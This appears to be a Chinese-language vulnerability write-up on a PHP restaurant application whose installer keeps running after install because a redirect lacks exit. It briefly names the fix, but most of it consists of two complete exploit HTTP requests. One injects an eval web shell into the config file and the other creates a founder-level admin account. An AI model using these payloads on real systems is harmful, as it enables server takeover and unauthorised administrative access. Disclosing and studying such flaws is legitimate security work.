问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
<?php
if(file_exists("../install.lock"))
{
    header("Location: ../");//没有退出
}

//echo 'tst';exit;
require_once("init.php");
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
可见在install.lock存在时,只是用header()做了302重定向,并没有exit,也就是说下面的逻辑还是会执行的(修复方法是在header()之后立即exit)。在这里至少可以产生两个漏洞。
1、getshell(很危险)
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
    $smarty->assign("step",1);
    $smarty->display("index.html");
}elseif($_REQUEST['step']==2)
{
    $mysql_host=trim($_POST['mysql_host']);
    $mysql_user=trim($_POST['mysql_user']);
    $mysql_pwd=trim($_POST['mysql_pwd']);
    $mysql_db=trim($_POST['mysql_db']);
    $tblpre=trim($_POST['tblpre']);
    $domain==trim($_POST['domain']);
    $str="<?php \r\n";
    $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
    $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
    $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
    $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
    $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
    $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
    $str.='define("DOMAIN","'.$domain.'");'."\r\n";
    $str.='define("SKINS","default");'."\r\n";
    $str.='?>';
    file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
上面的代码把POST提交的数据未经任何过滤或转义就直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
但是这个方法很危险,会覆盖原有的config.inc.php,导致网站无法运行。
2、直接添加管理员
elseif($_REQUEST['step']==5)
{
    if($_POST)
    {
        require_once("../config/config.inc.php");
        $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
        mysql_select_db(MYSQL_DB,$link);
        mysql_query("SET NAMES ".MYSQL_CHARSET );
        mysql_query("SET sql_mode=''");
        $adminname=trim($_POST['adminname']);
        $pwd1=trim($_POST['pwd1']);
        $pwd2=trim($_POST['pwd2']);
        if(empty($adminname))
        {
            echo "<script>alert('管理员不能为空');history.go(-1);</script>";
            exit();
        }
        if(($pwd1!=$pwd2) or empty($pwd1))
        {
            echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
        }
        mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
    }
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号(isfounder=1),语句如下:
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.2cto.com /canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

adminname=qingshen&pwd1=qingshen&pwd2=qingshen